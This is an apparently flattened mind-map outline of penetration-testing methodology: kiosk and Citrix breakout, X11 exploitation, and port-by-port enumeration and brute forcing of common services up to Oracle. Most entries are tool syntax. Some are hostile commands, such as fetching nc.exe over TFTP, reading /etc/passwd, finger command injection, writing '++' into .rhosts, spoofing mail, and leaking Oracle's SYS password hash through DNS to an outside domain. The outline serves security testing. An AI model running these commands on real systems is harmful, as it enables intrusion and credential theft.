1. Manual Testing
1.1. Create Batch File (cmd.bat)
1.1.1. 1
1.1.1.1. cmd.exe
1.1.2. 2
1.1.2.1. echo off
1.1.2.2. command
1.1.2.3. echo on
1.2. Host Scripting File (cmd.vbs)
1.2.1. Option Explicit
1.2.2. Dim objShell
1.2.3. objShell.Run "%comspec% /k"
1.2.4. WScript.Quit
1.2.5. alternative functionality
1.2.5.1. objShell.Run "%comspec% /k c: & dir"
1.2.5.2. objShell.Run "%comspec% /k c: & cd temp & dir >temp.txt & notepad temp.txt"
1.2.5.3. objShell.Run "%comspec% /k c: & tftp -i ip_address GET nc.exe" :-)
1.3. iKat
1.3.1. Integrated Kiosk Attack Tool
1.3.1.1. Reconnaissance
1.3.1.2. FileSystem Links
1.3.1.3. Common Dialogs
1.3.1.4. Application Handlers
1.3.1.5. Browser Plugins
1.3.1.6. iKAT Tools
1.4. AT Command - priviledge escalation
1.4.1. AT HH:MM /interactive "cmd.exe"
1.4.2. AT HH:MM /interactive %comspec% /k
1.4.3. Untitled
1.5. Keyboard Shortcuts/ Hotkeys
1.5.1. Ctrl + h – View History
1.5.2. Ctrl + n – New Browser
1.5.3. Shift + Left Click – New Browser
1.5.4. Ctrl + o – Internet Address (browse feature)
1.5.5. Ctrl + p – Print (to file)
1.5.6. Right Click (Shift + F10)
1.5.6.1. Save Image As
1.5.6.2. View Source
1.5.7. F1 – Jump to URL
1.5.8. SHIFT+F1: Local Task List
1.5.9. SHIFT+F2: Toggle Title Bar
1.5.10. SHIFT+F3: Close Remote Application
1.5.11. CTRL+F1: Displays Windows Security Desktop – Ctrl+Alt+Del
1.5.12. CTRL+F2: Remote Task List
1.5.13. CTRL+F3: Remote Task Manager – Ctrl+Shift+ESC
1.5.14. ALT+F2: Cycle through programs
1.5.15. ALT+PLUS: Alt+TAB
1.5.16. ALT+MINUS: ALT+SHIFT+TAB
2. inurl:Citrix/AccessPlatform/auth/login.aspx
3. X11 port 6000^ open
3.1. X11 Enumeration
3.1.1. List open windows
3.1.2. Authentication Method
3.1.2.1. Xauth
3.1.2.2. Xhost
3.2. X11 Exploitation
3.2.1. xwd
3.2.1.1. xwd -display 192.168.0.1:0 -root -out 192.168.0.1.xpm
3.2.2. Keystrokes
3.2.2.1. Received
3.2.2.2. Transmitted
3.2.3. Screenshots
3.2.4. xhost +
3.3. Examine Configuration Files
3.3.1. /etc/Xn.hosts
3.3.2. /usr/lib/X11/xdm
3.3.2.1. Untitled
3.3.3. /usr/lib/X11/xdm/xsession
3.3.4. /usr/lib/X11/xdm/xsession-remote
3.3.5. /usr/lib/X11/xdm/xsession.0
3.3.6. /usr/lib/X11/xdm/xdm-config
3.3.6.1. DisplayManager*authorize:on
4. pwdump [-h][-o][-u][-p] machineName
5. Nabil contributed the AS/400 section.
6. Client Side Security
7. Back end files
7.1. .exe / .txt / .doc / .ppt / .pdf / .vbs / .pl / .sh / .bat / .sql / .xls / .mdb / .conf
8. Set objShell = CreateObject("WScript.Shell")
9. Check visible areas for sensitive information.
10. InitialProgram=c:\windows\system32\cmd.exe
11. Pre-Inspection Visit - template
12. Discovery & Probing. Enumeration can serve two distinct purposes in an assessment: OS Fingerprinting Remote applications being served. OS fingerprinting or TCP/IP stack fingerprinting is the process of determining the operating system being utilised on a remote host. This is carried out by analyzing packets received from the host in question. There are two distinct ways to OS fingerprint, actively (i.e. nmap) or passively (i.e. scanrand). Passive OS fingerprinting determines the remote OS utilising the packets received only and does not require any packets to be sent. Active OS fingerprinting is very noisy and requires packets to be sent to the remote host and waits for a reply, (or lack thereof). Disparate OS's respond differently to certain types of packet, (the response is governed by an RFC and any proprietary responses the vendor (notably Microsoft) has enabled within the system) and so custom packets may be sent. Remote applications being served on a host can be determined by an open port on that host. By port scanning it is then possible to build up a picture of what applications are running and tailor the test accordingly.
12.1. Default Port Lists
12.1.1. Windows
12.1.2. *nix
12.2. Enumeration tools and techniques - The vast majority can be used generically, however, certain bespoke application require there own specific toolsets to be used. Default passwords are platform and vendor specific
12.2.1. General Enumeration Tools
12.2.1.1. nmap
12.2.1.1.1. nmap -n -A -PN -p- -T Agressive -iL nmap.targetlist -oX nmap.syn.results.xml
12.2.1.1.2. nmap -sU -PN -v -O -p 1-30000 -T polite -iL nmap.targetlist > nmap.udp.results
12.2.1.1.3. nmap -sV -PN -v -p 21,22,23,25,53,80,443,161 -iL nmap.targets > nmap.version.results
12.2.1.1.4. nmap -A -sS -PN -n --script:all ip_address --reason
12.2.1.1.5. grep "appears to be up" nmap_saved_filename | awk -F\( '{print $2}' | awk -F\) '{print $1}' > ip_list
12.2.1.2. netcat
12.2.1.2.1. nc -v -n IP_Address port
12.2.1.2.2. nc -v -w 2 -z IP_Address port_range/port_number
12.2.1.3. amap
12.2.1.3.1. amap -bqv 192.168.1.1 80
12.2.1.3.2. amap [-A|-B|-P|-W] [-1buSRHUdqv] [[-m] -o <file>] [-D <file>] [-t/-T sec] [-c cons] [-C retries] [-p proto] [-i <file>] [target port [port] ...]
12.2.1.4. xprobe2
12.2.1.4.1. xprobe2 192.168.1.1
12.2.1.5. sinfp
12.2.1.5.1. ./sinfp.pl -i -p
12.2.1.6. nbtscan
12.2.1.6.1. nbtscan [-v] [-d] [-e] [-l] [-t timeout] [-b bandwidth] [-r] [-q] [-s separator] [-m retransmits] (-f filename) | (<scan_range>)
12.2.1.7. hping
12.2.1.7.1. hping ip_address
12.2.1.8. scanrand
12.2.1.8.1. scanrand ip_address:all
12.2.1.9. unicornscan
12.2.1.9.1. unicornscan [options `b:B:d:De:EFhi:L:m:M:pP:q:r:R:s:St:T:w:W:vVZ:' ] IP_ADDRESS/ CIDR_NET_MASK: S-E
12.2.1.10. netenum
12.2.1.10.1. netenum network/netmask timeout
12.2.1.11. fping
12.2.1.11.1. fping -a -d hostname/ (Network/Subnet_Mask)
12.2.2. Firewall Specific Tools
12.2.2.1. firewalk
12.2.2.1.1. firewalk -p [protocol] -d [destination_port] -s [source_port] [internal_IP] [gateway_IP]
12.2.2.2. ftester
12.2.2.2.1. host 1 ./ftestd -i eth0 -v host 2 ./ftest -f ftest.conf -v -d 0.01 then ./freport ftest.log ftestd.log
12.2.3. Default Passwords (Examine list)
12.2.3.1. Passwords A
12.2.3.2. Passwords B
12.2.3.3. Passwords C
12.2.3.4. Passwords D
12.2.3.5. Passwords E
12.2.3.6. Passwords F
12.2.3.7. Passwords G
12.2.3.8. Passwords H
12.2.3.9. Passwords I
12.2.3.10. Passwords J
12.2.3.11. Passwords K
12.2.3.12. Passwords L
12.2.3.13. Passwords M
12.2.3.14. Passwords N
12.2.3.15. Passwords O
12.2.3.16. Passwords P
12.2.3.17. Passwords R
12.2.3.18. Passwords S
12.2.3.19. Passwords T
12.2.3.20. Passwords U
12.2.3.21. Passwords V
12.2.3.22. Passwords W
12.2.3.23. Passwords X
12.2.3.24. Passwords Y
12.2.3.25. Passwords Z
12.2.3.26. Passwords (Numeric)
12.3. Active Hosts
12.3.1. Open TCP Ports
12.3.2. Closed TCP Ports
12.3.3. Open UDP Ports
12.3.4. Closed UDP Ports
12.3.5. Service Probing
12.3.5.1. SMTP Mail Bouncing
12.3.5.2. Banner Grabbing
12.3.5.2.1. Other
12.3.5.2.2. HTTP
12.3.5.2.3. HTTPS
12.3.5.2.4. SMTP
12.3.5.2.5. POP3
12.3.5.2.6. FTP
12.3.6. ICMP Responses
12.3.6.1. Type 3 (Port Unreachable)
12.3.6.2. Type 8 (Echo Request)
12.3.6.3. Type 13 (Timestamp Request)
12.3.6.4. Type 15 (Information Request)
12.3.6.5. Type 17 (Subnet Address Mask Request)
12.3.6.6. Responses from broadcast address
12.3.7. Source Port Scans
12.3.7.1. TCP/UDP 53 (DNS)
12.3.7.2. TCP 20 (FTP Data)
12.3.7.3. TCP 80 (HTTP)
12.3.7.4. TCP/UDP 88 (Kerberos)
12.3.8. Firewall Assessment
12.3.8.1. Firewalk
12.3.8.2. TCP/UDP/ICMP responses
12.3.9. OS Fingerprint
13. Enumeration
13.1. Daytime port 13 open
13.1.1. nmap nse script
13.1.1.1. daytime
13.2. FTP port 21 open
13.2.1. Fingerprint server
13.2.1.1. telnet ip_address 21 (Banner grab)
13.2.1.2. Run command ftp ip_address
13.2.1.3. [email protected]
13.2.1.4. Check for anonymous access
13.2.1.4.1. ftp ip_addressUsername: anonymous OR anonPassword: [email protected]
13.2.2. Password guessing
13.2.2.1. Hydra brute force
13.2.2.2. medusa
13.2.2.3. Brutus
13.2.3. Examine configuration files
13.2.3.1. ftpusers
13.2.3.2. ftp.conf
13.2.3.3. proftpd.conf
13.2.4. MiTM
13.2.4.1. pasvagg.pl
13.3. SSH port 22 open
13.3.1. Fingerprint server
13.3.1.1. telnet ip_address 22 (banner grab)
13.3.1.2. scanssh
13.3.1.2.1. scanssh -p -r -e excludes random(no.)/Network_ID/Subnet_Mask
13.3.2. Password guessing
13.3.2.1. ssh root@ip_address
13.3.2.2. guess-who
13.3.2.2.1. ./b -l username -h ip_address -p 22 -2 < password_file_location
13.3.2.3. Hydra brute force
13.3.2.4. brutessh
13.3.2.5. Ruby SSH Bruteforcer
13.3.3. Examine configuration files
13.3.3.1. ssh_config
13.3.3.2. sshd_config
13.3.3.3. authorized_keys
13.3.3.4. ssh_known_hosts
13.3.3.5. .shosts
13.3.4. SSH Client programs
13.3.4.1. tunnelier
13.3.4.2. winsshd
13.3.4.3. putty
13.3.4.4. winscp
13.4. Telnet port 23 open
13.4.1. Fingerprint server
13.4.1.1. telnet ip_address
13.4.1.1.1. Common Banner ListOS/BannerSolaris 8/SunOS 5.8Solaris 2.6/SunOS 5.6Solaris 2.4 or 2.5.1/Unix(r) System V Release 4.0 (hostname)SunOS 4.1.x/SunOS Unix (hostname)FreeBSD/FreeBSD/i386 (hostname) (ttyp1)NetBSD/NetBSD/i386 (hostname) (ttyp1)OpenBSD/OpenBSD/i386 (hostname) (ttyp1)Red Hat 8.0/Red Hat Linux release 8.0 (Psyche)Debian 3.0/Debian GNU/Linux 3.0 / hostnameSGI IRIX 6.x/IRIX (hostname)IBM AIX 4.1.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1994.IBM AIX 4.2.x or 4.3.x/AIX Version 4 (C) Copyrights by IBM and by others 1982, 1996.Nokia IPSO/IPSO (hostname) (ttyp0)Cisco IOS/User Access VerificationLivingston ComOS/ComOS - Livingston PortMaster
13.4.1.2. telnetfp
13.4.2. Password Attack
13.4.2.1. Untitled
13.4.2.2. Brutus
13.4.2.3. Hydra brute force
13.4.2.4. telnet -l "-froot" hostname (Solaris 10+)
13.4.3. Examine configuration files
13.4.3.1. /etc/xinetd.d/telnet
13.4.3.2. /etc/xinetd.d/stelnet
13.5. Sendmail Port 25 open
13.5.1. Fingerprint server
13.5.1.1. telnet ip_address 25 (banner grab)
13.5.2. Mail Server Testing
13.5.2.1. Enumerate users
13.5.2.1.1. VRFY username (verifies if username exists - enumeration of accounts)
13.5.2.1.2. EXPN username (verifies if username is valid - enumeration of accounts)
13.5.2.2. Mail Spoof Test
13.5.2.2.1. HELO anything MAIL FROM: spoofed_address RCPT TO:valid_mail_account DATA . QUIT
13.5.2.3. /etc/inetd.conf
13.5.2.4. Mail Relay Test
13.5.2.4.1. Untitled
13.5.3. Examine Configuration Files
13.5.3.1. sendmail.cf
13.5.3.2. submit.cf
13.6. DNS port 53 open
13.6.1. Fingerprint server/ service
13.6.1.1. host
13.6.1.1.1. host [-aCdlnrTwv ] [-c class ] [-N ndots ] [-R number ] [-t type ] [-W wait ] name [server ] -v verbose format -t (query type) Allows a user to specify a record type i.e. A, NS, or PTR. -a Same as –t ANY. -l Zone transfer (if allowed). -f Save to a specified filename.
13.6.1.2. nslookup
13.6.1.2.1. nslookup [ -option ... ] [ host-to-find | - [ server ]]
13.6.1.3. dig
13.6.1.3.1. dig [ @server ] [-b address ] [-c class ] [-f filename ] [-k filename ] [-p port# ] [-t type ] [-x addr ] [-y name:key ] [-4 ] [-6 ] [name ] [type ] [class ] [queryopt... ]
13.6.1.4. whois-h Use the named host to resolve the query -a Use ARIN to resolve the query -r Use RIPE to resolve the query -p Use APNIC to resolve the query -Q Perform a quick lookup
13.6.2. DNS Enumeration
13.6.2.1. Bile Suite
13.6.2.1.1. perl BiLE.pl [website] [project_name]
13.6.2.1.2. perl BiLE-weigh.pl [website] [input file]
13.6.2.1.3. perl vet-IPrange.pl [input file] [true domain file] [output file] <range>
13.6.2.1.4. perl vet-mx.pl [input file] [true domain file] [output file]
13.6.2.1.5. perl exp-tld.pl [input file] [output file]
13.6.2.1.6. perl jarf-dnsbrute [domain_name] (brutelevel) [file_with_names]
13.6.2.1.7. perl jarf-rev [subnetblock] [nameserver]
13.6.2.2. txdns
13.6.2.2.1. txdns -rt -t domain_name
13.6.2.2.2. txdns -x 50 -bb domain_name
13.6.2.3. nmap nse scripts
13.6.2.3.1. dns-random-srcport
13.6.2.3.2. dns-random-txid
13.6.2.3.3. dns-recursion
13.6.2.3.4. dns-zone-transfer
13.6.3. Examine Configuration Files
13.6.3.1. host.conf
13.6.3.2. resolv.conf
13.6.3.3. named.conf
13.7. perl qtrace.pl [ip_address_file] [output_file]
13.8. TFTP port 69 open
13.8.1. TFTP Enumeration
13.8.1.1. tftp ip_address PUT local_file
13.8.1.2. tftp ip_address GET conf.txt (or other files)
13.8.1.3. Solarwinds TFTP server
13.8.1.4. tftp – i <IP> GET /etc/passwd (old Solaris)
13.8.2. TFTP Bruteforcing
13.8.2.1. TFTP bruteforcer
13.8.2.2. Cisco-Torch
13.9. Finger Port 79 open
13.9.1. User enumeration
13.9.1.1. finger 'a b c d e f g h' @example.com
13.9.1.2. finger [email protected]
13.9.1.3. finger [email protected]
13.9.1.4. finger [email protected]
13.9.1.5. finger [email protected]
13.9.1.6. finger **@example.com
13.9.1.7. finger [email protected]
13.9.1.8. finger @example.com
13.9.1.9. nmap nse script
13.9.1.9.1. finger
13.9.2. Command execution
13.9.2.1. finger "|/bin/[email protected]"
13.9.2.2. finger "|/bin/ls -a /@example.com"
13.9.3. Finger Bounce
13.9.3.1. finger user@host@victim
13.9.3.2. finger @internal@external
13.10. Web Ports 80,8080 etc. open
13.10.1. Fingerprint server
13.10.1.1. Telnet ip_address port
13.10.1.2. Firefox plugins
13.10.1.2.1. All
13.10.1.2.2. Specific
13.10.2. Crawl website
13.10.2.1. lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
13.10.2.2. httprint
13.10.2.3. Metagoofil
13.10.2.3.1. metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
13.10.3. Web Directory enumeration
13.10.3.1. Nikto
13.10.3.1.1. nikto [-h target] [options]
13.10.3.2. DirBuster
13.10.3.3. Wikto
13.10.3.4. Goolag Scanner
13.10.4. Vulnerability Assessment
13.10.4.1. Manual Tests
13.10.4.1.1. Default Passwords
13.10.4.1.2. Install Backdoors
13.10.4.1.3. Method Testing
13.10.4.1.4. Upload Files
13.10.4.1.5. View Page Source
13.10.4.1.6. Input Validation Checks
13.10.4.1.7. Automated table and column iteration
13.10.4.2. Vulnerability Scanners
13.10.4.2.1. Acunetix
13.10.4.2.2. Grendelscan
13.10.4.2.3. NStealth
13.10.4.2.4. Obiwan III
13.10.4.2.5. w3af
13.10.4.3. Specific Applications/ Server Tools
13.10.4.3.1. Domino
13.10.4.3.2. Joomla
13.10.4.3.3. aspaudit.pl
13.10.4.3.4. Vbulletin
13.10.4.3.5. ZyXel
13.10.5. Proxy Testing
13.10.5.1. Burpsuite
13.10.5.2. Crowbar
13.10.5.3. Interceptor
13.10.5.4. Paros
13.10.5.5. Requester Raw
13.10.5.6. Suru
13.10.5.7. WebScarab
13.10.6. Examine configuration files
13.10.6.1. Generic
13.10.6.1.1. Examine httpd.conf/ windows config files
13.10.6.2. JBoss
13.10.6.2.1. JMX Console http://<IP>:8080/jmxconcole/
13.10.6.3. Joomla
13.10.6.3.1. configuration.php
13.10.6.3.2. diagnostics.php
13.10.6.3.3. joomla.inc.php
13.10.6.3.4. config.inc.php
13.10.6.4. Mambo
13.10.6.4.1. configuration.php
13.10.6.4.2. config.inc.php
13.10.6.5. Wordpress
13.10.6.5.1. setup-config.php
13.10.6.5.2. wp-config.php
13.10.6.6. ZyXel
13.10.6.6.1. /WAN.html (contains PPPoE ISP password)
13.10.6.6.2. /WLAN_General.html and /WLAN.html (contains WEP key)
13.10.6.6.3. /rpDyDNS.html (contains DDNS credentials)
13.10.6.6.4. /Firewall_DefPolicy.html (Firewall)
13.10.6.6.5. /CF_Keyword.html (Content Filter)
13.10.6.6.6. /RemMagWWW.html (Remote MGMT)
13.10.6.6.7. /rpSysAdmin.html (System)
13.10.6.6.8. /LAN_IP.html (LAN)
13.10.6.6.9. /NAT_General.html (NAT)
13.10.6.6.10. /ViewLog.html (Logs)
13.10.6.6.11. /rpFWUpload.html (Tools)
13.10.6.6.12. /DiagGeneral.html (Diagnostic)
13.10.6.6.13. /RemMagSNMP.html (SNMP Passwords)
13.10.6.6.14. /LAN_ClientList.html (Current DHCP Leases)
13.10.6.6.15. Config Backups
13.10.7. Examine web server logs
13.10.7.1. c:\winnt\system32\Logfiles\W3SVC1
13.10.7.1.1. awk -F " " '{print $3,$11} filename | sort | uniq
13.10.8. References
13.10.8.1. White Papers
13.10.8.1.1. Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
13.10.8.1.2. Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
13.10.8.1.3. Blind Security Testing - An Evolutionary Approach
13.10.8.1.4. Command Injection in XML Signatures and Encryption
13.10.8.1.5. Input Validation Cheat Sheet
13.10.8.1.6. SQL Injection Cheat Sheet
13.10.8.2. Books
13.10.8.2.1. Hacking Exposed Web 2.0
13.10.8.2.2. Hacking Exposed Web Applications
13.10.8.2.3. The Web Application Hacker's Handbook
13.10.9. Exploit Frameworks
13.10.9.1. Brute-force Tools
13.10.9.1.1. Acunetix
13.10.9.2. Metasploit
13.10.9.3. w3af
13.11. Portmapper port 111 open
13.11.1. rpcdump.py
13.11.1.1. rpcdump.py username:password@IP_Address port/protocol (i.e. 80/HTTP)
13.11.2. rpcinfo
13.11.2.1. rpcinfo [options] IP_Address
13.12. NTP Port 123 open
13.12.1. NTP Enumeration
13.12.1.1. ntpdc -c monlist IP_ADDRESS
13.12.1.2. ntpdc -c sysinfo IP_ADDRESS
13.12.1.3. ntpq
13.12.1.3.1. host
13.12.1.3.2. hostname
13.12.1.3.3. ntpversion
13.12.1.3.4. readlist
13.12.1.3.5. version
13.12.2. Examine configuration files
13.12.2.1. ntp.conf
13.12.3. nmap nse script
13.12.3.1. ntp-info
13.13. NetBIOS Ports 135-139,445 open
13.13.1. NetBIOS enumeration
13.13.1.1. Enum
13.13.1.1.1. enum <-UMNSPGLdc> <-u username> <-p password> <-f dictfile> <hostname|ip>
13.13.1.2. Null Session
13.13.1.2.1. net use \\192.168.1.1\ipc$ "" /u:""
13.13.1.3. Smbclient
13.13.1.3.1. smbclient -L //server/share password options
13.13.1.4. Superscan
13.13.1.4.1. Enumeration tab.
13.13.1.5. user2sid/sid2user
13.13.1.6. Winfo
13.13.2. NetBIOS brute force
13.13.2.1. Hydra
13.13.2.2. Brutus
13.13.2.3. Cain & Abel
13.13.2.4. getacct
13.13.2.5. NAT (NetBIOS Auditing Tool)
13.13.3. Examine Configuration Files
13.13.3.1. Smb.conf
13.13.3.2. lmhosts
13.14. SNMP port 161 open
13.14.1. Default Community Strings
13.14.1.1. public
13.14.1.2. private
13.14.1.3. cisco
13.14.1.3.1. cable-docsis
13.14.1.3.2. ILMI
13.14.2. MIB enumeration
13.14.2.1. Windows NT
13.14.2.1.1. .1.3.6.1.2.1.1.5 Hostnames
13.14.2.1.2. .1.3.6.1.4.1.77.1.4.2 Domain Name
13.14.2.1.3. .1.3.6.1.4.1.77.1.2.25 Usernames
13.14.2.1.4. .1.3.6.1.4.1.77.1.2.3.1.1 Running Services
13.14.2.1.5. .1.3.6.1.4.1.77.1.2.27 Share Information
13.14.2.2. Solarwinds MIB walk
13.14.2.3. Getif
13.14.2.4. snmpwalk
13.14.2.4.1. snmpwalk -v <Version> -c <Community string> <IP>
13.14.2.5. Snscan
13.14.2.6. Applications
13.14.2.6.1. ZyXel
13.14.2.7. nmap nse script
13.14.2.7.1. snmp-sysdescr
13.14.3. SNMP Bruteforce
13.14.3.1. onesixtyone
13.14.3.1.1. onesixytone -c SNMP.wordlist <IP>
13.14.3.2. cat
13.14.3.2.1. ./cat -h <IP> -w SNMP.wordlist
13.14.3.3. Solarwinds SNMP Brute Force
13.14.3.4. ADMsnmp
13.14.3.5. nmap nse script
13.14.3.5.1. snmp-brute
13.14.4. Examine SNMP Configuration files
13.14.4.1. snmp.conf
13.14.4.2. snmpd.conf
13.14.4.3. snmp-config.xml
13.15. LDAP Port 389 Open
13.15.1. ldap enumeration
13.15.1.1. ldapminer
13.15.1.1.1. ldapminer -h ip_address -p port (not required if default) -d
13.15.1.2. luma
13.15.1.2.1. Gui based tool
13.15.1.3. ldp
13.15.1.3.1. Gui based tool
13.15.1.4. openldap
13.15.1.4.1. ldapsearch [-n] [-u] [-v] [-k] [-K] [-t] [-A] [-L[L[L]]] [-M[M]] [-d debuglevel] [-f file] [-D binddn] [-W] [-w passwd] [-y passwdfile] [-H ldapuri] [-h ldaphost] [-p ldapport] [-P 2|3] [-b searchbase] [-s base|one|sub] [-a never|always|search|find] [-l timelimit] [-z sizelimit] [-O security-properties] [-I] [-U authcid] [-R realm] [-x] [-X authzid] [-Y mech] [-Z[Z]] filter [attrs...]
13.15.1.4.2. ldapadd [-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-h ldaphost][-p ldap-port][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
13.15.1.4.3. ldapdelete [-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-f file][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-P 2|3][-p ldapport][-O security-properties][-U authcid][-R realm][-x][-I][-Q] [-X authzid][-Y mech][-Z[Z]][dn]
13.15.1.4.4. ldapmodify [-a][-c][-S file][-n][-v][-k][-K][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile][-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x][-X authzid][-Y mech][-Z[Z]][-f file]
13.15.1.4.5. ldapmodrdn [-r][-n][-v][-k][-K][-c][-M[M]][-d debuglevel][-D binddn][-W][-w passwd][-y passwdfile] [-H ldapuri][-h ldaphost][-p ldapport][-P 2|3][-O security-properties][-I][-Q][-U authcid][-R realm][-x] [-X authzid][-Y mech][-Z[Z]][-f file][dn rdn]
13.15.2. ldap brute force
13.15.2.1. bf_ldap
13.15.2.1.1. bf_ldap -s server -d domain name -u|-U username | users list file name -L|-l passwords list | length of passwords to generate optional: -p port (default 389) -v (verbose mode) -P Ldap user path (default ,CN=Users,)
13.15.2.2. K0ldS
13.15.2.3. LDAP_Brute.pl
13.15.3. Examine Configuration Files
13.15.3.1. General
13.15.3.1.1. containers.ldif
13.15.3.1.2. ldap.cfg
13.15.3.1.3. ldap.conf
13.15.3.1.4. ldap.xml
13.15.3.1.5. ldap-config.xml
13.15.3.1.6. ldap-realm.xml
13.15.3.1.7. slapd.conf
13.15.3.2. IBM SecureWay V3 server
13.15.3.2.1. V3.sas.oc
13.15.3.3. Microsoft Active Directory server
13.15.3.3.1. msadClassesAttrs.ldif
13.15.3.4. Netscape Directory Server 4
13.15.3.4.1. nsslapd.sas_at.conf
13.15.3.4.2. nsslapd.sas_oc.conf
13.15.3.5. OpenLDAP directory server
13.15.3.5.1. slapd.sas_at.conf
13.15.3.5.2. slapd.sas_oc.conf
13.15.3.6. Sun ONE Directory Server 5.1
13.15.3.6.1. 75sas.ldif
13.16. PPTP/L2TP/VPN port 500/1723 open
13.16.1. Enumeration
13.16.1.1. ike-scan
13.16.1.2. ike-probe
13.16.2. Brute-Force
13.16.2.1. ike-crack
13.16.3. Reference Material
13.16.3.1. PSK cracking paper
13.16.3.2. SecurityFocus Infocus
13.16.3.3. Scanning a VPN Implementation
13.17. Modbus port 502 open
13.17.1. modscan
13.18. rlogin port 513 open
13.18.1. Rlogin Enumeration
13.18.1.1. Find the files
13.18.1.1.1. find / -name .rhosts
13.18.1.1.2. locate .rhosts
13.18.1.2. Examine Files
13.18.1.2.1. cat .rhosts
13.18.1.3. Manual Login
13.18.1.3.1. rlogin hostname -l username
13.18.1.3.2. rlogin <IP>
13.18.1.4. Subvert the files
13.18.1.4.1. echo ++ > .rhosts
13.18.2. Rlogin Brute force
13.18.2.1. Hydra
13.19. rsh port 514 open
13.19.1. Rsh Enumeration
13.19.1.1. rsh host [-l username] [-n] [-d] [-k realm] [-f | -F] [-x] [-PN | -PO] command
13.19.2. Rsh Brute Force
13.19.2.1. rsh-grind
13.19.2.2. Hydra
13.19.2.3. medusa
13.20. SQL Server Port 1433 1434 open
13.20.1. SQL Enumeration
13.20.1.1. piggy
13.20.1.2. SQLPing
13.20.1.2.1. sqlping ip_address/hostname
13.20.1.3. SQLPing2
13.20.1.4. SQLPing3
13.20.1.5. SQLpoke
13.20.1.6. SQL Recon
13.20.1.7. SQLver
13.20.2. SQL Brute Force
13.20.2.1. SQLPAT
13.20.2.1.1. sqlbf -u hashes.txt -d dictionary.dic -r out.rep - Dictionary Attack
13.20.2.1.2. sqlbf -u hashes.txt -c default.cm -r out.rep - Brute-Force Attack
13.20.2.2. SQL Dict
13.20.2.3. SQLAT
13.20.2.4. Hydra
13.20.2.5. SQLlhf
13.20.2.6. ForceSQL
13.21. Citrix port 1494 open
13.21.1. Citrix Enumeration
13.21.1.1. Default Domain
13.21.1.2. Published Applications
13.21.1.2.1. ./citrix-pa-scan {IP_address/file | - | random} [timeout]
13.21.1.2.2. citrix-pa-proxy.pl IP_to_proxy_to [Local_IP]
13.21.2. Citrix Brute Force
13.21.2.1. bforce.js
13.21.2.2. connect.js
13.21.2.3. Citrix Brute-forcer
13.21.2.4. Reference Material
13.21.2.4.1. Hacking Citrix - the legitimate backdoor
13.21.2.4.2. Hacking Citrix - the forceful way
13.22. Oracle Port 1521 Open
13.22.1. Oracle Enumeration
13.22.1.1. oracsec
13.22.1.2. Repscan
13.22.1.3. Sidguess
13.22.1.4. Scuba
13.22.1.5. DNS/HTTP Enumeration
13.22.1.5.1. SQL> SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE US ERNAME='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL; SELECT UTL_INADDR.GET_HOST_ADDRESS((SELECT PASSWORD FROM DBA_USERS WHERE USERNAM E='SYS')||'.vulnerabilityassessment.co.uk') FROM DUAL
13.22.1.5.2. Untitled
13.22.1.6. WinSID
13.22.1.7. Oracle default password list
13.22.1.8. TNSVer
13.22.1.8.1. tnsver host [port]
13.22.1.9. TCP Scan
13.22.1.10. Oracle TNSLSNR
13.22.1.10.1. Will respond to: [ping] [version] [status] [service] [change_password] [help] [reload] [save_config] [set log_directory] [set display_mode] [set log_file] [show] [spawn] [stop]
13.22.1.11. TNSCmd
13.22.1.11.1. perl tnscmd.pl -h ip_address
13.22.1.11.2. perl tnscmd.pl version -h ip_address
13.22.1.11.3. perl tnscmd.pl status -h ip_address
13.22.1.11.4. perl tnscmd.pl -h ip_address --cmdsize (40 - 200)
13.22.1.12. LSNrCheck
13.22.1.13. Oracle Security Check (needs credentials)
13.22.1.14. OAT
13.22.1.14.1. sh opwg.sh -s ip_address
13.22.1.14.2. opwg.bat -s ip_address
13.22.1.14.3. sh oquery.sh -s ip_address -u username -p password -d SID OR c:\oquery -s ip_address -u username -p password -d SID
13.22.1.15. OScanner
13.22.1.15.1. sh oscanner.sh -s ip_address
13.22.1.15.2. oscanner.exe -s ip_address
13.22.1.15.3. sh reportviewer.sh oscanner_saved_file.xml
13.22.1.15.4. reportviewer.exe oscanner_saved_file.xml
13.22.1.16. NGS Squirrel for Oracle
13.22.1.17. Service Register
13.22.1.17.1. Service-register.exe ip_address
13.22.1.18. PLSQL Scanner 2008
13.22.2. Oracle Brute Force
13.22.2.1. OAK
13.22.2.1.1. ora-getsid hostname port sid_dictionary_list
13.22.2.1.2. ora-auth-alter-session host port sid username password sql
13.22.2.1.3. ora-brutesid host port start
13.22.2.1.4. ora-pwdbrute host port sid username password-file
13.22.2.1.5. ora-userenum host port sid userlistfile
13.22.2.1.6. ora-ver -e (-f -l -a) host port
13.22.2.2. breakable (Targets Application Server Port)
13.22.2.2.1. breakable.exe host url [port] [v]host ip_address of the Oracle Portal Serverurl PATH_INFO i.e. /pls/orassoport TCP port Oracle Portal Server is serving pages fromv verbose
13.22.2.3. SQLInjector (Targets Application Server Port)
13.22.2.3.1. sqlinjector -t ip_address -a database -f query.txt -p 80 -gc 200 -ec 500 -k NGS SOFTWARE -gt SQUIRREL
13.22.2.3.2. sqlinjector.exe -t ip_address -p 7777 -a where -gc 200 -ec 404 -qf q.txt -f plsql.txt -s oracle
13.22.2.4. Check Password
13.22.2.5. orabf
13.22.2.5.1. orabf [hash]:[username] [options]
13.22.2.6. thc-orakel
13.22.2.6.1. Cracker
13.22.2.6.2. Client
13.22.2.6.3. Crypto
13.22.2.7. DBVisualisor
13.22.2.7.1. Sql scripts from pentest.co.uk
13.22.2.7.2. Manual sql input of previously reported vulnerabilties
13.22.3. Oracle Reference Material
13.22.3.1. Understanding SQL Injection
13.22.3.2. SQL Injection walkthrough
13.22.3.3. SQL Injection by example
13.22.3.4. Advanced SQL Injection in Oracle databases
